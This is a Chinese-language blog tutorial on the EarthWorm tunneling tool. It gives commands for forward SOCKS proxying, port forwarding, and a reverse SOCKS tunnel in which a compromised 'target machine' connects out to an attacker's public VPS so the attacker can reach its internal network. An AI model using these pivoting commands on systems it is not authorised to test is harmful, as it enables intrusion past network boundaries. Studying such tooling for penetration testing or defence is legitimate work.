内网代理工具--EarthWorm

一、简介

        EarthWorm是内网穿透的神器,拥有三项功能正向代理,反向代理,端口转发。
为实现这些功能,EarthWorm建立了六大功能模块。分别是ssocksd , rcsocks , rssocks ,lcx_listen , lcx_tran , lcx_slave。
从三项功能的角度可以这样划分
功能名称
对应模块
正向代理
ssocksd
反向代理
rcsocks,rssocks
端口转发
lcx_listen,lcx_slave,lcx_tran

二、正向代理

一条命令即可
./ew -s ssocksd --listenport 1080 
or
./ew -s ssocksd -l 1080

三、反向代理

此处需要使用两个功能模块rcsosks,rssocks
        在很多场景,无法直接连接需要当做代理的主机,那么怎么解决这个问题呢?EarthWorm的解决方法十分简单,考虑到我们无法直接连接代理主机,但是代理主机可以主动连接我们,因此需要等待该主机主动连接承担代理任务。而这就是rccosks,rssocks的命令设计想法。rcsocks建立本地代理客户端,指定本地监听反弹的端口,rssocks建立本地代理服务端,并指定建立服务端后主动连接的远程主机的IP和端口。

第1步:在公网的VPS上执行如下命令:

./ew_for_linux64 -s rcsocks -l 1080 -e 1024 &
该命令的意思是说公网机器监听1080和1024端口。等待攻击者机器访问1080端口,目标机器访问1024端口。

第2步:目标机器执行如下命令:

./ew_for_Win.exe -s rssocks -d 120.xxx.xxx.xx -e 1024
其中-d参数的值为刚刚的公网IP

第3步:攻击者机器通过proxychains或浏览器设置Socks5代理访问目标内网服务

四、端口转发

该功能涉及三个功能模块:lcx_listen,lcx_slave,lcx_tran这三个模块可以建立任意形式的端口转发,可以将内网最深处的主机端口转发出来。
常见的使用命令组合如下:
./ew -s lcx_listen -l 1080 -e 8888 
./ew -s lcx_tran -l 1080 -f [connIP] -g 8888
数据流向 local:1080 < — > local:8888 < — > remoteIP:1080
用于实现将本地端口转发到远程可直接连接的某主机的端口,
./ew -s lcx_listen -l 1080 -e 8888 
./ew -s lcx_slave -d [ref_ip] -e 1080 -f [connIP] -g 1080
数据流向 connIP:8888 < — > connIP:1080 < — > ref_ip:1080
还可以有许多组合方式,需要时进行总结。

点赞

发表评论

您的电子邮箱地址不会被公开。 必填项已用*标注